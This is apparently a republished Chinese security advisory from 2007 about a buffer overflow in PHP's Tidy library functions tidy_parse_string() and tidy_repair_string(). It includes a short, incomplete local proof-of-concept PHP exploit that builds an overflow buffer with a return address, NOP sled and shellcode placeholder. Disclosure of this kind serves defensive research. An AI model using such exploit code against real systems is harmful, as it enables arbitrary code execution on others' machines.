发布日期：2007-06-19
更新日期：2007-06-20

受影响系统：
C. Reitzel TidyLib for PHP 050506
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 24527

Tidy库用于改正HTML文档中的常见错误并生成格式编排良好的等价文档，还可以生成XHTML格式的文档。

Tidy库实现上存在缓冲区溢出漏洞，攻击者可能利用此漏洞通过诱使用户处理恶意文档执行恶意指令。

PHP所使用的Tidy库中没有正确验证对tidy_parse_string()和tidy_repair_string()函数的输入。如果用户向这些函数传送了超长参数的话，就可能触发缓冲区溢出，导致执行任意指令。

<*来源：rgod （rgod@autistici.org） *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested; //0x7C81518B      call esp kernel32.dll
$NOP=str_repeat("x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

建议：
--------------------------------------------------------------------------------
厂商补丁：

C. Reitzel
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dev.int64.org/tidy.html

　　推荐阅读

　　AOL Instant Messenger SIP INVITE消息远程拒绝服务漏洞

【51CTO.com 独家消息】发布日期：2007-06-19 更新日期：2007-06-20受影响系统： AOL Instant Messenger 6.1.32.1 描述： -------------------------------------------------------------------------------->>>详细阅读

本文标题：PHP Tidy库远程缓冲区溢出漏洞

地址：http://www.17bianji.com/anquan/buding/2726.html

 1/2    1